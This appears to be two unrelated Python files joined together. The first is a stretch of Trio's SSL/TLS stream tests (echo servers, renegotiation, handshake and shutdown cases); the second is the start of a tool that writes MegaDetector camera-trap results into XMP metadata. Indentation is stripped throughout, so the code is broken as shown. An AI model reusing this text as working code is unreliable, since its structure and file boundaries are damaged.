# echo server (running in a thread)
@asynccontextmanager
@async_generator
async def ssl_echo_server(**kwargs):
async with ssl_echo_server_raw(**kwargs) as sock:
await yield_(
SSLStream(
sock, CLIENT_CTX, server_hostname="trio-test-1.example.org"
)
)
# The weird in-memory server ... thing.
# Doesn't inherit from Stream because I left out the methods that we don't
# actually need.
class PyOpenSSLEchoStream:
def __init__(self, sleeper=None):
ctx = SSL.Context(SSL.SSLv23_METHOD)
# TLS 1.3 removes renegotiation support. Which is great for them, but
# we still have to support versions before that, and that means we
# need to test renegotiation support, which means we need to force this
# to use a lower version where this test server can trigger
# renegotiations. Of course TLS 1.3 support isn't released yet, but
# I'm told that this will work once it is. (And once it is we can
# remove the pragma: no cover too.) Alternatively, once we drop
# support for CPython 3.5 on macOS, then we could switch to using
# TLSv1_2_METHOD.
#
# Discussion: https://github.com/pyca/pyopenssl/issues/624
if hasattr(SSL, "OP_NO_TLSv1_3"):
ctx.set_options(SSL.OP_NO_TLSv1_3)
# Unfortunately there's currently no way to say "use 1.3 or worse", we
# can only disable specific versions. And if the two sides start
# negotiating 1.4 at some point in the future, it *might* mean that
# our tests silently stop working properly. So the next line is a
# tripwire to remind us we need to revisit this stuff in 5 years or
# whatever when the next TLS version is released:
assert not hasattr(SSL, "OP_NO_TLSv1_4")
TRIO_TEST_1_CERT.configure_cert(ctx)
self._conn = SSL.Connection(ctx, None)
self._conn.set_accept_state()
self._lot = _core.ParkingLot()
self._pending_cleartext = bytearray()
self._send_all_conflict_detector = ConflictDetector(
"simultaneous calls to PyOpenSSLEchoStream.send_all"
)
self._receive_some_conflict_detector = ConflictDetector(
"simultaneous calls to PyOpenSSLEchoStream.receive_some"
)
if sleeper is None:
async def no_op_sleeper(_):
return
self.sleeper = no_op_sleeper
else:
self.sleeper = sleeper
async def aclose(self):
self._conn.bio_shutdown()
def renegotiate_pending(self):
return self._conn.renegotiate_pending()
def renegotiate(self):
# Returns false if a renegotiation is already in progress, meaning
# nothing happens.
assert self._conn.renegotiate()
async def wait_send_all_might_not_block(self):
with self._send_all_conflict_detector:
await _core.checkpoint()
await _core.checkpoint()
await self.sleeper("wait_send_all_might_not_block")
async def send_all(self, data):
print(" --> transport_stream.send_all")
with self._send_all_conflict_detector:
await _core.checkpoint()
await _core.checkpoint()
await self.sleeper("send_all")
self._conn.bio_write(data)
while True:
await self.sleeper("send_all")
try:
data = self._conn.recv(1)
except SSL.ZeroReturnError:
self._conn.shutdown()
print("renegotiations:", self._conn.total_renegotiations())
break
except SSL.WantReadError:
break
else:
self._pending_cleartext += data
self._lot.unpark_all()
await self.sleeper("send_all")
print(" <-- transport_stream.send_all finished")
async def receive_some(self, nbytes=None):
print(" --> transport_stream.receive_some")
if nbytes is None:
nbytes = 65536 # arbitrary
with self._receive_some_conflict_detector:
try:
await _core.checkpoint()
await _core.checkpoint()
while True:
await self.sleeper("receive_some")
try:
return self._conn.bio_read(nbytes)
except SSL.WantReadError:
# No data in our ciphertext buffer; try to generate
# some.
if self._pending_cleartext:
# We have some cleartext; maybe we can encrypt it
# and then return it.
print(" trying", self._pending_cleartext)
try:
# PyOpenSSL bug: doesn't accept bytearray
# https://github.com/pyca/pyopenssl/issues/621
next_byte = self._pending_cleartext[0:1]
self._conn.send(bytes(next_byte))
# Apparently this next bit never gets hit in the
# test suite, but it's not an interesting omission
# so let's pragma it.
except SSL.WantReadError: # pragma: no cover
# We didn't manage to send the cleartext (and
# in particular we better leave it there to
# try again, due to openssl's retry
# semantics), but it's possible we pushed a
# renegotiation forward and *now* we have data
# to send.
try:
return self._conn.bio_read(nbytes)
except SSL.WantReadError:
# Nope. We're just going to have to wait
# for someone to call send_all() to give
# use more data.
print("parking (a)")
await self._lot.park()
else:
# We successfully sent that byte, so we don't
# have to again.
del self._pending_cleartext[0:1]
else:
# no pending cleartext; nothing to do but wait for
# someone to call send_all
print("parking (b)")
await self._lot.park()
finally:
await self.sleeper("receive_some")
print(" <-- transport_stream.receive_some finished")
async def test_PyOpenSSLEchoStream_gives_resource_busy_errors():
# Make sure that PyOpenSSLEchoStream complains if two tasks call send_all
# at the same time, or ditto for receive_some. The tricky cases where SSLStream
# might accidentally do this are during renegotiation, which we test using
# PyOpenSSLEchoStream, so this makes sure that if we do have a bug then
# PyOpenSSLEchoStream will notice and complain.
s = PyOpenSSLEchoStream()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(s.send_all, b"x")
nursery.start_soon(s.send_all, b"x")
assert "simultaneous" in str(excinfo.value)
s = PyOpenSSLEchoStream()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(s.send_all, b"x")
nursery.start_soon(s.wait_send_all_might_not_block)
assert "simultaneous" in str(excinfo.value)
s = PyOpenSSLEchoStream()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(s.wait_send_all_might_not_block)
nursery.start_soon(s.wait_send_all_might_not_block)
assert "simultaneous" in str(excinfo.value)
s = PyOpenSSLEchoStream()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(s.receive_some, 1)
nursery.start_soon(s.receive_some, 1)
assert "simultaneous" in str(excinfo.value)
@contextmanager
def virtual_ssl_echo_server(**kwargs):
fakesock = PyOpenSSLEchoStream(**kwargs)
yield SSLStream(
fakesock, CLIENT_CTX, server_hostname="trio-test-1.example.org"
)
def ssl_wrap_pair(
client_transport, server_transport, *, client_kwargs={}, server_kwargs={}
):
client_ssl = SSLStream(
client_transport,
CLIENT_CTX,
server_hostname="trio-test-1.example.org",
**client_kwargs
)
server_ssl = SSLStream(
server_transport, SERVER_CTX, server_side=True, **server_kwargs
)
return client_ssl, server_ssl
def ssl_memory_stream_pair(**kwargs):
client_transport, server_transport = memory_stream_pair()
return ssl_wrap_pair(client_transport, server_transport, **kwargs)
def ssl_lockstep_stream_pair(**kwargs):
client_transport, server_transport = lockstep_stream_pair()
return ssl_wrap_pair(client_transport, server_transport, **kwargs)
# Simple smoke test for handshake/send/receive/shutdown talking to a
# synchronous server, plus make sure that we do the bare minimum of
# certificate checking (even though this is really Python's responsibility)
async def test_ssl_client_basics():
# Everything OK
async with ssl_echo_server() as s:
assert not s.server_side
await s.send_all(b"x")
assert await s.receive_some(1) == b"x"
await s.aclose()
# Didn't configure the CA file, should fail
async with ssl_echo_server_raw(expect_fail=True) as sock:
client_ctx = ssl.create_default_context()
s = SSLStream(
sock, client_ctx, server_hostname="trio-test-1.example.org"
)
assert not s.server_side
with pytest.raises(BrokenResourceError) as excinfo:
await s.send_all(b"x")
assert isinstance(excinfo.value.__cause__, ssl.SSLError)
# Trusted CA, but wrong host name
async with ssl_echo_server_raw(expect_fail=True) as sock:
s = SSLStream(
sock, CLIENT_CTX, server_hostname="trio-test-2.example.org"
)
assert not s.server_side
with pytest.raises(BrokenResourceError) as excinfo:
await s.send_all(b"x")
assert isinstance(excinfo.value.__cause__, ssl.CertificateError)
async def test_ssl_server_basics():
a, b = stdlib_socket.socketpair()
with a, b:
server_sock = tsocket.from_stdlib_socket(b)
server_transport = SSLStream(
SocketStream(server_sock), SERVER_CTX, server_side=True
)
assert server_transport.server_side
def client():
client_sock = CLIENT_CTX.wrap_socket(
a, server_hostname="trio-test-1.example.org"
)
client_sock.sendall(b"x")
assert client_sock.recv(1) == b"y"
client_sock.sendall(b"z")
client_sock.unwrap()
t = threading.Thread(target=client)
t.start()
assert await server_transport.receive_some(1) == b"x"
await server_transport.send_all(b"y")
assert await server_transport.receive_some(1) == b"z"
assert await server_transport.receive_some(1) == b""
await server_transport.aclose()
t.join()
async def test_attributes():
async with ssl_echo_server_raw(expect_fail=True) as sock:
good_ctx = CLIENT_CTX
bad_ctx = ssl.create_default_context()
s = SSLStream(
sock, good_ctx, server_hostname="trio-test-1.example.org"
)
assert s.transport_stream is sock
# Forwarded attribute getting
assert s.context is good_ctx
assert s.server_side == False # noqa
assert s.server_hostname == "trio-test-1.example.org"
with pytest.raises(AttributeError):
s.asfdasdfsa
# __dir__
assert "transport_stream" in dir(s)
assert "context" in dir(s)
# Setting the attribute goes through to the underlying object
# most attributes on SSLObject are read-only
with pytest.raises(AttributeError):
s.server_side = True
with pytest.raises(AttributeError):
s.server_hostname = "asdf"
# but .context is *not*. Check that we forward attribute setting by
# making sure that after we set the bad context our handshake indeed
# fails:
s.context = bad_ctx
assert s.context is bad_ctx
with pytest.raises(BrokenResourceError) as excinfo:
await s.do_handshake()
assert isinstance(excinfo.value.__cause__, ssl.SSLError)
# Note: this test fails horribly if we force TLS 1.2 and trigger a
# renegotiation at the beginning (e.g. by switching to the pyopenssl
# server). Usually the client crashes in SSLObject.write with "UNEXPECTED
# RECORD"; sometimes we get something more exotic like a SyscallError. This is
# odd because openssl isn't doing any syscalls, but so it goes. After lots of
# websearching I'm pretty sure this is due to a bug in OpenSSL, where it just
# can't reliably handle full-duplex communication combined with
# renegotiation. Nice, eh?
#
# https://rt.openssl.org/Ticket/Display.html?id=3712
# https://rt.openssl.org/Ticket/Display.html?id=2481
# http://openssl.6102.n7.nabble.com/TLS-renegotiation-failure-on-receiving-application-data-during-handshake-td48127.html
# https://stackoverflow.com/questions/18728355/ssl-renegotiation-with-full-duplex-socket-communication
#
# In some variants of this test (maybe only against the java server?) I've
# also seen cases where our send_all blocks waiting to write, and then our receive_some
# also blocks waiting to write, and they never wake up again. It looks like
# some kind of deadlock. I suspect there may be an issue where we've filled up
# the send buffers, and the remote side is trying to handle the renegotiation
# from inside a write() call, so it has a problem: there's all this application
# data clogging up the pipe, but it can't process and return it to the
# application because it's in write(), and it doesn't want to buffer infinite
# amounts of data, and... actually I guess those are the only two choices.
#
# NSS even documents that you shouldn't try to do a renegotiation except when
# the connection is idle:
#
# https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/SSL_functions/sslfnc.html#1061582
#
# I begin to see why HTTP/2 forbids renegotiation and TLS 1.3 removes it...
async def test_full_duplex_basics():
CHUNKS = 30
CHUNK_SIZE = 32768
EXPECTED = CHUNKS * CHUNK_SIZE
sent = bytearray()
received = bytearray()
async def sender(s):
nonlocal sent
for i in range(CHUNKS):
print(i)
chunk = bytes([i] * CHUNK_SIZE)
sent += chunk
await s.send_all(chunk)
async def receiver(s):
nonlocal received
while len(received) < EXPECTED:
chunk = await s.receive_some(CHUNK_SIZE // 2)
received += chunk
async with ssl_echo_server() as s:
async with _core.open_nursery() as nursery:
nursery.start_soon(sender, s)
nursery.start_soon(receiver, s)
# And let's have some doing handshakes too, everyone
# simultaneously
nursery.start_soon(s.do_handshake)
nursery.start_soon(s.do_handshake)
await s.aclose()
assert len(sent) == len(received) == EXPECTED
assert sent == received
async def test_renegotiation_simple():
with virtual_ssl_echo_server() as s:
await s.do_handshake()
s.transport_stream.renegotiate()
await s.send_all(b"a")
assert await s.receive_some(1) == b"a"
# Have to send some more data back and forth to make sure the
# renegotiation is finished before shutting down the
# connection... otherwise openssl raises an error. I think this is a
# bug in openssl but what can ya do.
await s.send_all(b"b")
assert await s.receive_some(1) == b"b"
await s.aclose()
@slow
async def test_renegotiation_randomized(mock_clock):
# The only blocking things in this function are our random sleeps, so 0 is
# a good threshold.
mock_clock.autojump_threshold = 0
import random
r = random.Random(0)
async def sleeper(_):
await trio.sleep(r.uniform(0, 10))
async def clear():
while s.transport_stream.renegotiate_pending():
with assert_checkpoints():
await send(b"-")
with assert_checkpoints():
await expect(b"-")
print("-- clear --")
async def send(byte):
await s.transport_stream.sleeper("outer send")
print("calling SSLStream.send_all", byte)
with assert_checkpoints():
await s.send_all(byte)
async def expect(expected):
await s.transport_stream.sleeper("expect")
print("calling SSLStream.receive_some, expecting", expected)
assert len(expected) == 1
with assert_checkpoints():
assert await s.receive_some(1) == expected
with virtual_ssl_echo_server(sleeper=sleeper) as s:
await s.do_handshake()
await send(b"a")
s.transport_stream.renegotiate()
await expect(b"a")
await clear()
for i in range(100):
b1 = bytes([i % 0xff])
b2 = bytes([(2 * i) % 0xff])
s.transport_stream.renegotiate()
async with _core.open_nursery() as nursery:
nursery.start_soon(send, b1)
nursery.start_soon(expect, b1)
async with _core.open_nursery() as nursery:
nursery.start_soon(expect, b2)
nursery.start_soon(send, b2)
await clear()
for i in range(100):
b1 = bytes([i % 0xff])
b2 = bytes([(2 * i) % 0xff])
await send(b1)
s.transport_stream.renegotiate()
await expect(b1)
async with _core.open_nursery() as nursery:
nursery.start_soon(expect, b2)
nursery.start_soon(send, b2)
await clear()
# Checking that wait_send_all_might_not_block and receive_some don't
# conflict:
# 1) Set up a situation where expect (receive_some) is blocked sending,
# and wait_send_all_might_not_block comes in.
# Our receive_some() call will get stuck when it hits send_all
async def sleeper_with_slow_send_all(method):
if method == "send_all":
await trio.sleep(100000)
# And our wait_send_all_might_not_block call will give it time to get
# stuck, and then start
async def sleep_then_wait_writable():
await trio.sleep(1000)
await s.wait_send_all_might_not_block()
with virtual_ssl_echo_server(sleeper=sleeper_with_slow_send_all) as s:
await send(b"x")
s.transport_stream.renegotiate()
async with _core.open_nursery() as nursery:
nursery.start_soon(expect, b"x")
nursery.start_soon(sleep_then_wait_writable)
await clear()
await s.aclose()
# 2) Same, but now wait_send_all_might_not_block is stuck when
# receive_some tries to send.
async def sleeper_with_slow_wait_writable_and_expect(method):
if method == "wait_send_all_might_not_block":
await trio.sleep(100000)
elif method == "expect":
await trio.sleep(1000)
with virtual_ssl_echo_server(
sleeper=sleeper_with_slow_wait_writable_and_expect
) as s:
await send(b"x")
s.transport_stream.renegotiate()
async with _core.open_nursery() as nursery:
nursery.start_soon(expect, b"x")
nursery.start_soon(s.wait_send_all_might_not_block)
await clear()
await s.aclose()
async def test_resource_busy_errors():
async def do_send_all():
with assert_checkpoints():
await s.send_all(b"x")
async def do_receive_some():
with assert_checkpoints():
await s.receive_some(1)
async def do_wait_send_all_might_not_block():
with assert_checkpoints():
await s.wait_send_all_might_not_block()
s, _ = ssl_lockstep_stream_pair()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(do_send_all)
nursery.start_soon(do_send_all)
assert "another task" in str(excinfo.value)
s, _ = ssl_lockstep_stream_pair()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(do_receive_some)
nursery.start_soon(do_receive_some)
assert "another task" in str(excinfo.value)
s, _ = ssl_lockstep_stream_pair()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(do_send_all)
nursery.start_soon(do_wait_send_all_might_not_block)
assert "another task" in str(excinfo.value)
s, _ = ssl_lockstep_stream_pair()
with pytest.raises(_core.BusyResourceError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(do_wait_send_all_might_not_block)
nursery.start_soon(do_wait_send_all_might_not_block)
assert "another task" in str(excinfo.value)
async def test_wait_writable_calls_underlying_wait_writable():
record = []
class NotAStream:
async def wait_send_all_might_not_block(self):
record.append("ok")
ctx = ssl.create_default_context()
s = SSLStream(NotAStream(), ctx, server_hostname="x")
await s.wait_send_all_might_not_block()
assert record == ["ok"]
async def test_checkpoints():
async with ssl_echo_server() as s:
with assert_checkpoints():
await s.do_handshake()
with assert_checkpoints():
await s.do_handshake()
with assert_checkpoints():
await s.wait_send_all_might_not_block()
with assert_checkpoints():
await s.send_all(b"xxx")
with assert_checkpoints():
await s.receive_some(1)
# These receive_some's in theory could return immediately, because the
# "xxx" was sent in a single record and after the first
# receive_some(1) the rest are sitting inside the SSLObject's internal
# buffers.
with assert_checkpoints():
await s.receive_some(1)
with assert_checkpoints():
await s.receive_some(1)
with assert_checkpoints():
await s.unwrap()
async with ssl_echo_server() as s:
await s.do_handshake()
with assert_checkpoints():
await s.aclose()
async def test_send_all_empty_string():
async with ssl_echo_server() as s:
await s.do_handshake()
# underlying SSLObject interprets writing b"" as indicating an EOF,
# for some reason. Make sure we don't inherit this.
with assert_checkpoints():
await s.send_all(b"")
with assert_checkpoints():
await s.send_all(b"")
await s.send_all(b"x")
assert await s.receive_some(1) == b"x"
await s.aclose()
@pytest.mark.parametrize("https_compatible", [False, True])
async def test_SSLStream_generic(https_compatible):
async def stream_maker():
return ssl_memory_stream_pair(
client_kwargs={"https_compatible": https_compatible},
server_kwargs={"https_compatible": https_compatible},
)
async def clogged_stream_maker():
client, server = ssl_lockstep_stream_pair()
# If we don't do handshakes up front, then we run into a problem in
# the following situation:
# - server does wait_send_all_might_not_block
# - client does receive_some to unclog it
# Then the client's receive_some will actually send some data to start
# the handshake, and itself get stuck.
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
return client, server
await check_two_way_stream(stream_maker, clogged_stream_maker)
async def test_unwrap():
client_ssl, server_ssl = ssl_memory_stream_pair()
client_transport = client_ssl.transport_stream
server_transport = server_ssl.transport_stream
seq = Sequencer()
async def client():
await client_ssl.do_handshake()
await client_ssl.send_all(b"x")
assert await client_ssl.receive_some(1) == b"y"
await client_ssl.send_all(b"z")
# After sending that, disable outgoing data from our end, to make
# sure the server doesn't see our EOF until after we've sent some
# trailing data
async with seq(0):
send_all_hook = client_transport.send_stream.send_all_hook
client_transport.send_stream.send_all_hook = None
assert await client_ssl.receive_some(1) == b""
assert client_ssl.transport_stream is client_transport
# We just received EOF. Unwrap the connection and send some more.
raw, trailing = await client_ssl.unwrap()
assert raw is client_transport
assert trailing == b""
assert client_ssl.transport_stream is None
await raw.send_all(b"trailing")
# Reconnect the streams. Now the server will receive both our shutdown
# acknowledgement + the trailing data in a single lump.
client_transport.send_stream.send_all_hook = send_all_hook
await client_transport.send_stream.send_all_hook()
async def server():
await server_ssl.do_handshake()
assert await server_ssl.receive_some(1) == b"x"
await server_ssl.send_all(b"y")
assert await server_ssl.receive_some(1) == b"z"
# Now client is blocked waiting for us to send something, but
# instead we close the TLS connection (with sequencer to make sure
# that the client won't see and automatically respond before we've had
# a chance to disable the client->server transport)
async with seq(1):
raw, trailing = await server_ssl.unwrap()
assert raw is server_transport
assert trailing == b"trailing"
assert server_ssl.transport_stream is None
async with _core.open_nursery() as nursery:
nursery.start_soon(client)
nursery.start_soon(server)
async def test_closing_nice_case():
# the nice case: graceful closes all around
client_ssl, server_ssl = ssl_memory_stream_pair()
client_transport = client_ssl.transport_stream
# Both the handshake and the close require back-and-forth discussion, so
# we need to run them concurrently
async def client_closer():
with assert_checkpoints():
await client_ssl.aclose()
async def server_closer():
assert await server_ssl.receive_some(10) == b""
assert await server_ssl.receive_some(10) == b""
with assert_checkpoints():
await server_ssl.aclose()
async with _core.open_nursery() as nursery:
nursery.start_soon(client_closer)
nursery.start_soon(server_closer)
# closing the SSLStream also closes its transport
with pytest.raises(ClosedResourceError):
await client_transport.send_all(b"123")
# once closed, it's OK to close again
with assert_checkpoints():
await client_ssl.aclose()
with assert_checkpoints():
await client_ssl.aclose()
# Trying to send more data does not work
with pytest.raises(ClosedResourceError):
await server_ssl.send_all(b"123")
# And once the connection has been closed *locally*, then instead of
# getting empty bytestrings we get a proper error
with pytest.raises(ClosedResourceError):
await client_ssl.receive_some(10) == b""
with pytest.raises(ClosedResourceError):
await client_ssl.unwrap()
with pytest.raises(ClosedResourceError):
await client_ssl.do_handshake()
# Check that a graceful close *before* handshaking gives a clean EOF on
# the other side
client_ssl, server_ssl = ssl_memory_stream_pair()
async def expect_eof_server():
with assert_checkpoints():
assert await server_ssl.receive_some(10) == b""
with assert_checkpoints():
await server_ssl.aclose()
async with _core.open_nursery() as nursery:
nursery.start_soon(client_ssl.aclose)
nursery.start_soon(expect_eof_server)
async def test_send_all_fails_in_the_middle():
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
async def bad_hook():
raise KeyError
client.transport_stream.send_stream.send_all_hook = bad_hook
with pytest.raises(KeyError):
await client.send_all(b"x")
with pytest.raises(BrokenResourceError):
await client.wait_send_all_might_not_block()
closed = 0
def close_hook():
nonlocal closed
closed += 1
client.transport_stream.send_stream.close_hook = close_hook
client.transport_stream.receive_stream.close_hook = close_hook
await client.aclose()
assert closed == 2
async def test_ssl_over_ssl():
client_0, server_0 = memory_stream_pair()
client_1 = SSLStream(
client_0, CLIENT_CTX, server_hostname="trio-test-1.example.org"
)
server_1 = SSLStream(server_0, SERVER_CTX, server_side=True)
client_2 = SSLStream(
client_1, CLIENT_CTX, server_hostname="trio-test-1.example.org"
)
server_2 = SSLStream(server_1, SERVER_CTX, server_side=True)
async def client():
await client_2.send_all(b"hi")
assert await client_2.receive_some(10) == b"bye"
async def server():
assert await server_2.receive_some(10) == b"hi"
await server_2.send_all(b"bye")
async with _core.open_nursery() as nursery:
nursery.start_soon(client)
nursery.start_soon(server)
async def test_ssl_bad_shutdown():
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
await trio.aclose_forcefully(client)
# now the server sees a broken stream
with pytest.raises(BrokenResourceError):
await server.receive_some(10)
with pytest.raises(BrokenResourceError):
await server.send_all(b"x" * 10)
await server.aclose()
async def test_ssl_bad_shutdown_but_its_ok():
client, server = ssl_memory_stream_pair(
server_kwargs={"https_compatible": True},
client_kwargs={"https_compatible": True}
)
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
await trio.aclose_forcefully(client)
# the server sees that as a clean shutdown
assert await server.receive_some(10) == b""
with pytest.raises(BrokenResourceError):
await server.send_all(b"x" * 10)
await server.aclose()
async def test_ssl_handshake_failure_during_aclose():
# Weird scenario: aclose() triggers an automatic handshake, and this
# fails. This also exercises a bit of code in aclose() that was otherwise
# uncovered, for re-raising exceptions after calling aclose_forcefully on
# the underlying transport.
async with ssl_echo_server_raw(expect_fail=True) as sock:
# Don't configure trust correctly
client_ctx = ssl.create_default_context()
s = SSLStream(
sock, client_ctx, server_hostname="trio-test-1.example.org"
)
# It's a little unclear here whether aclose should swallow the error
# or let it escape. We *do* swallow the error if it arrives when we're
# sending close_notify, because both sides closing the connection
# simultaneously is allowed. But I guess when https_compatible=False
# then it's bad if we can get through a whole connection with a peer
# that has no valid certificate, and never raise an error.
with pytest.raises(BrokenResourceError):
await s.aclose()
async def test_ssl_only_closes_stream_once():
# We used to have a bug where if transport_stream.aclose() raised an
# error, we would call it again. This checks that that's fixed.
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
client_orig_close_hook = client.transport_stream.send_stream.close_hook
transport_close_count = 0
def close_hook():
nonlocal transport_close_count
client_orig_close_hook()
transport_close_count += 1
raise KeyError
client.transport_stream.send_stream.close_hook = close_hook
with pytest.raises(KeyError):
await client.aclose()
assert transport_close_count == 1
async def test_ssl_https_compatibility_disagreement():
client, server = ssl_memory_stream_pair(
server_kwargs={"https_compatible": False},
client_kwargs={"https_compatible": True}
)
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
# client is in HTTPS-mode, server is not
# so client doing graceful_shutdown causes an error on server
async def receive_and_expect_error():
with pytest.raises(BrokenResourceError) as excinfo:
await server.receive_some(10)
assert isinstance(excinfo.value.__cause__, ssl.SSLEOFError)
async with _core.open_nursery() as nursery:
nursery.start_soon(client.aclose)
nursery.start_soon(receive_and_expect_error)
async def test_https_mode_eof_before_handshake():
client, server = ssl_memory_stream_pair(
server_kwargs={"https_compatible": True},
client_kwargs={"https_compatible": True}
)
async def server_expect_clean_eof():
assert await server.receive_some(10) == b""
async with _core.open_nursery() as nursery:
nursery.start_soon(client.aclose)
nursery.start_soon(server_expect_clean_eof)
async def test_send_error_during_handshake():
client, server = ssl_memory_stream_pair()
async def bad_hook():
raise KeyError
client.transport_stream.send_stream.send_all_hook = bad_hook
with pytest.raises(KeyError):
with assert_checkpoints():
await client.do_handshake()
with pytest.raises(BrokenResourceError):
with assert_checkpoints():
await client.do_handshake()
async def test_receive_error_during_handshake():
client, server = ssl_memory_stream_pair()
async def bad_hook():
raise KeyError
client.transport_stream.receive_stream.receive_some_hook = bad_hook
async def client_side(cancel_scope):
with pytest.raises(KeyError):
with assert_checkpoints():
await client.do_handshake()
cancel_scope.cancel()
async with _core.open_nursery() as nursery:
nursery.start_soon(client_side, nursery.cancel_scope)
nursery.start_soon(server.do_handshake)
with pytest.raises(BrokenResourceError):
with assert_checkpoints():
await client.do_handshake()
async def test_selected_alpn_protocol_before_handshake():
client, server = ssl_memory_stream_pair()
with pytest.raises(NeedHandshakeError):
client.selected_alpn_protocol()
with pytest.raises(NeedHandshakeError):
server.selected_alpn_protocol()
async def test_selected_alpn_protocol_when_not_set():
# ALPN protocol still returns None when it's not set,
# instead of raising an exception
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
assert client.selected_alpn_protocol() is None
assert server.selected_alpn_protocol() is None
assert client.selected_alpn_protocol() == \
server.selected_alpn_protocol()
async def test_selected_npn_protocol_before_handshake():
client, server = ssl_memory_stream_pair()
with pytest.raises(NeedHandshakeError):
client.selected_npn_protocol()
with pytest.raises(NeedHandshakeError):
server.selected_npn_protocol()
async def test_selected_npn_protocol_when_not_set():
# NPN protocol still returns None when it's not set,
# instead of raising an exception
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
assert client.selected_npn_protocol() is None
assert server.selected_npn_protocol() is None
assert client.selected_npn_protocol() == \
server.selected_npn_protocol()
async def test_get_channel_binding_before_handshake():
client, server = ssl_memory_stream_pair()
with pytest.raises(NeedHandshakeError):
client.get_channel_binding()
with pytest.raises(NeedHandshakeError):
server.get_channel_binding()
async def test_get_channel_binding_after_handshake():
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
assert client.get_channel_binding() is not None
assert server.get_channel_binding() is not None
assert client.get_channel_binding() == \
server.get_channel_binding()
async def test_getpeercert():
# Make sure we're not affected by https://bugs.python.org/issue29334
client, server = ssl_memory_stream_pair()
async with _core.open_nursery() as nursery:
nursery.start_soon(client.do_handshake)
nursery.start_soon(server.do_handshake)
assert server.getpeercert() is None
print(client.getpeercert())
assert (
("DNS",
"trio-test-1.example.org") in client.getpeercert()["subjectAltName"]
)
async def test_SSLListener():
async def setup(**kwargs):
listen_sock = tsocket.socket()
await listen_sock.bind(("127.0.0.1", 0))
listen_sock.listen(1)
socket_listener = SocketListener(listen_sock)
ssl_listener = SSLListener(socket_listener, SERVER_CTX, **kwargs)
transport_client = await open_tcp_stream(*listen_sock.getsockname())
ssl_client = SSLStream(
transport_client,
CLIENT_CTX,
server_hostname="trio-test-1.example.org"
)
return listen_sock, ssl_listener, ssl_client
listen_sock, ssl_listener, ssl_client = await setup()
async with ssl_client:
ssl_server = await ssl_listener.accept()
async with ssl_server:
assert not ssl_server._https_compatible
# Make sure the connection works
async with _core.open_nursery() as nursery:
nursery.start_soon(ssl_client.do_handshake)
nursery.start_soon(ssl_server.do_handshake)
# Test SSLListener.aclose
await ssl_listener.aclose()
assert listen_sock.fileno() == -1
################
# Test https_compatible
_, ssl_listener, ssl_client = await setup(https_compatible=True)
ssl_server = await ssl_listener.accept()
assert ssl_server._https_compatible
await aclose_forcefully(ssl_listener)
await aclose_forcefully(ssl_client)
await aclose_forcefully(ssl_server)
async def test_deprecated_max_refill_bytes():
stream1, stream2 = memory_stream_pair()
with pytest.warns(trio.TrioDeprecationWarning):
SSLStream(stream1, CLIENT_CTX, max_refill_bytes=100)
with pytest.warns(trio.TrioDeprecationWarning):
# passing None is wrong here, but I'm too lazy to make a fake Listener
# and we get away with it for now. And this test will be deleted in a
# release or two anyway, so hopefully we'll keep getting away with it
# for long enough.
SSLListener(None, CLIENT_CTX, max_refill_bytes=100)
|
xmp_integration.py
|
#
# xmp_integration.py
#
# Tools for loading MegaDetector batch API results into XMP metadata, specifically
# for consumption in digiKam:
#
# https://cran.r-project.org/web/packages/camtrapR/vignettes/camtrapr2.html
#
#%% Imports and constants
import argparse
import tkinter
from tkinter import ttk, messagebox, filedialog
import inspect
import os
import sys
import json
import pyexiv2
import ntpath
import threading
import traceback
from tqdm import tqdm
from multiprocessing import Pool
from multiprocessing.pool import ThreadPool
from functools import partial
category_mapping = {'person': 'Human', 'animal': 'Animal', 'vehicle': 'Vehicle'}
#%% Class definitions
class xmp_gui:
root = None
textarea_min_threshold = None
textarea_status = None
textarea_remove_path = None
textarea_rename_conf = None
textarea_rename_cats = None
num_threads = 1
class xmp_integration_options:
# Folder where images are stored
image_folder = None
# .json file containing MegaDetector output
input_file = None
# String to remove from all path names, typically representing a
# prefix that was added during MegaDetector processing
remove_path = None
# Optionally *rename* (not copy) all images that have no detections
# above [rename_conf] for the categories in rename_cats from x.jpg to
# x_check.jpg (matching the renaming logic in update_xmp_metadata below)
rename_conf = None
# Comma-delimited list of category names (or "all") to apply the rename_conf
# behavior to.
rename_cats = None
# Minimum detection threshold (applies to all classes, defaults to None,
# i.e. 0.0)
min_threshold = None
num_threads = 1
xmp_gui = None
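# Usage sketch for the command-line path (paths and thresholds below are
# hypothetical, for illustration only; process_input_data() is defined under
# "Functions" below):
#
#     options = xmp_integration_options()
#     options.image_folder = '/data/camera_trap_images'
#     options.input_file = '/data/megadetector_output.json'
#     options.min_threshold = '0.8'   # stored as a string, like the GUI fields
#     options.rename_conf = '0.8'
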